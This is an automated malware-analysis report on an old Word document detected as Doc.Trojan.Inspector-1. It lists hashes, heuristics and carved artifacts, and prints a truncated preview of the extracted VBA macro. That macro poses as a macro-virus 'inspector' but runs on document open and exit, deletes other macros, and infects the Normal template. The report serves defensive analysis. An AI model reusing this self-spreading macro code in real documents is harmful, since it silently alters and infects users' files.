Office (OLE) malware analysis — malicious · 848a772890397b81

MALICIOUS

Office (OLE)

772.5 KB Created: 2001-04-14 04:52:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 4c5dfceee02302802db00a88bee45f17 SHA-1: b2056d8392f81e0e5100386bcc9442c19945e939 SHA-256: 848a772890397b81cc53c73ad43a350fc3d43cbf80c8faa1874d9d0296e76ac9

220 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The file is identified as malicious by ClamAV with the signature 'Doc.Trojan.Inspector-1'. It contains multiple VBA macros, including AutoOpen, Document_Open, and Auto_Close, which are commonly used to execute malicious code upon opening or closing a document. The presence of a 'VirusInspect' module with functions to delete code suggests an attempt to self-modify or evade analysis.

Heuristics 6

ClamAV: Doc.Trojan.Inspector-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Inspector-1
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 16

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	31995 bytes
SHA-256: `fefa910e096600845d1fe0e1d50ead0b674e20d859d857ba22ea1f233065bc1f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "VirusInspect" ' Inspector Version 8.2 Option Explicit Dim KillCount As Integer Dim sAutoNames As Variant Dim bInited As Boolean Dim LatestVer As Double Dim g_VBCom As Variant Dim DetectedList As New Collection Const Logo As String = "Wu's Macro Virus Inspector " Function Detected(doc As Variant) As Integer Dim i As Integer For i = 1 To DetectedList.count If (doc.Name = DetectedList.Item(i)) Then Detected = i Exit Function End If Next Detected = 0 End Function Sub SetDetectedFlag(doc As Variant, ByVal f As Boolean) Dim i As Integer i = Detected(doc) If (f) Then If (i < 1) Then DetectedList.Add (doc.Name) End If Else If (i > 0) Then DetectedList.Remove (i) End If End If End Sub Sub ClearReg() While DetectedList.count > 0 DetectedList.Remove (1) Wend End Sub Sub DeleteCode(cm As Variant, ByVal st, n As Long) KillCount = KillCount + 1 Call cm.deletelines(st, n) ShowStatus ("Delete From Line " & st & "to " & st + n) End Sub Sub KillSub(cm As Variant, ByVal Name As String) Dim i, n As Long 'Dim cmd As CodeModule If (Not cm.Find(Name, 1, 1, cm.CountOfLines + 1, 1)) Then Exit Sub End If On Error GoTo Err i = cm.ProcStartLine(Name, 0) 'vbext_pk_Proc) n = cm.ProcCountLines(Name, 0) ' vbext_pk_Proc) If (InStr(1, cm.Lines(i, 1), "Wu", vbTextCompare) < 1) Then Call DeleteCode(cm, i, n) End If Exit Sub Err: End Sub Sub KillAutoMod(md As Variant) Dim Name As Variant For Each Name In sAutoNames If (InStr(1, md.Name, Name, vbTextCompare) > 0) Then Call KillSub(md, "MAIN") End If Next Name End Sub Sub KillVirus(doc As Variant) 'Document) 'VBProject Dim prj As Variant 'VBProject Dim obj As Variant Dim Name As Variant Dim j, n As Integer Dim md As Variant 'CodeModule Dim VBCom As Variant 'VBComponents Dim count As Integer Dim saved As Boolean Call Init If (Detected(doc)) Then Exit Sub End If saved = doc.saved count = KillCount Set prj = doc.VBProject Set VBCom = prj.VBComponents For j = 1 To VBCom.count Set md = VBCom.Item(j).codemodule Call KillAutoMod(md) Next j For j = 1 To VBCom.count Set md = VBCom.Item(j).codemodule ShowStatus "Scanning In " & md.Name For Each Name In sAutoNames Call KillSub(md, Name) Next Name Call KillAutoMod(md) Next j Call SetDetectedFlag(doc, True) ' prj.VBComponents(1).Activate If (KillCount > count) Then ClearReg If (saved) Then Call SafeSave(doc) Else doc.saved = False End If Else If (saved) Then doc.saved = True End If End If End Sub Sub DetectAll() Dim doc As Variant 'Document For Each doc In Documents Call KillVirus(doc) Next For Each doc In Templates Call KillVirus(doc) Next If (KillCount > 0) Then ShowStatus "杀掉 " & KillCount & "个病毒！但未保存" Else ShowStatus "未发现宏病毒！" End If KillCount = 0 End Sub Sub Init() Dim i As Integer Dim obj As Variant If (bInited) Then Exit Sub End If 'MsgBox "Init" sAutoNames = Array("Document_Close", "Document_Open", _ "AutoClose", "AutoOpen", "Document_New", "AutoExec", _ "AutoNew", "AutoExit") Call SetAttr(Application.NormalTemplate.FullName, 32) 'vbArchive) Set obj = Application.NormalTemplate Call InfectTo(obj) KillCount = 0 ClearReg bInited = True End Sub Sub AutoExit() 'Wu's Sub Call DetectAll End Sub Sub AutoOpen() 'Wu's Sub Call DetectAll End Sub Sub AutoNew() 'Wu's Sub Call Det ... (truncated)
`ole10native_00.bin`	ole-package	OLE Ole10Native stream: ObjectPool/_1048573574/Ole10Native	15492 bytes
SHA-256: `c820e0070b49154c0cd0958fd784e9fc3d4bc5c55eef686cc782491a60fafb35`
`ole10native_01.bin`	ole-package	OLE Ole10Native stream: ObjectPool/_1048574117/Ole10Native	23716 bytes
SHA-256: `816d007886a7edcfaa14c910218da02ddd1c3e9be3fe41c78cb0a6266d854476`
`ole10native_02.bin`	ole-package	OLE Ole10Native stream: ObjectPool/_1048574509/Ole10Native	3236 bytes
SHA-256: `96471b6674dcb04b1c8c530a4a533fae8e5dd31bed39c6cbe4b1531f6eb7381f`
`ole10native_03.bin`	ole-package	OLE Ole10Native stream: ObjectPool/_1048755155/Ole10Native	1956 bytes
SHA-256: `95c250f5632bbed4fd004b2bcca781534fc0b195a66486365d91a21088abdbcd`
`ole10native_04.bin`	ole-package	OLE Ole10Native stream: ObjectPool/_1048755510/Ole10Native	10724 bytes
SHA-256: `f7d7951f6971631d6ef3517b4d1de3719ee7f23433e8fdeb2196251cef240b10`
`ole10native_05.bin`	ole-package	OLE Ole10Native stream: ObjectPool/_1048755999/Ole10Native	12132 bytes
SHA-256: `3053e92978917bf5de1711055a7808815a759866375c171e3898a2845fda1b2b`
`ole10native_06.bin`	ole-package	OLE Ole10Native stream: ObjectPool/_1048756154/Ole10Native	26692 bytes
SHA-256: `e141134c18036ff24d4681e1dd3e879a7a2722b2360e392e0259650a355ac0fd`
`ole10native_07.bin`	ole-package	OLE Ole10Native stream: ObjectPool/_1048756410/Ole10Native	32132 bytes
SHA-256: `e6589e6f3365193a3b382500220d30dcaf7d509842bd98879ff8d1d9b23a7714`
`ole10native_08.bin`	ole-package	OLE Ole10Native stream: ObjectPool/_1048756448/Ole10Native	8932 bytes
SHA-256: `210c22e0247d8805614098a3d6a5a8aa790ec41502684d335df9f46029c37989`
`ole10native_09.bin`	ole-package	OLE Ole10Native stream: ObjectPool/_1048756820/Ole10Native	26884 bytes
SHA-256: `275dd3da36073e348982410db6ebe2b27a10be098c88137700dcb4e97666f893`
`ole10native_10.bin`	ole-package	OLE Ole10Native stream: ObjectPool/_1048757115/Ole10Native	35012 bytes
SHA-256: `5be12318fbb8d73ad57d48268788290b0a31c7a018acedfa7cc2731ca4abea96`
`ole10native_11.bin`	ole-package	OLE Ole10Native stream: ObjectPool/_1048757229/Ole10Native	13252 bytes
SHA-256: `069b1cdaafdf792b0486b344d961ff419a0a03e31f075117007ad0b9686574a4`
`ole10native_12.bin`	ole-package	OLE Ole10Native stream: ObjectPool/_1048757266/Ole10Native	29476 bytes
SHA-256: `1684490e54f11709b162c5367e37689c40d2bfb58f2ad07ba81fe1ca9f8cee41`
`ole10native_13.bin`	ole-package	OLE Ole10Native stream: ObjectPool/_1048757368/Ole10Native	34308 bytes
SHA-256: `289822dc487d8f1d128bc17c72ad0140a48af786192291f04f825a25c93b9e07`
`ole10native_14.bin`	ole-package	OLE Ole10Native stream: ObjectPool/_1048757615/Ole10Native	24900 bytes
SHA-256: `2fb2a14bfcae835c2342d459a9183f38b03a8a4eee48ff151508c4beaae5d579`

Open this report in the interactive analyzer, or submit your own file for analysis.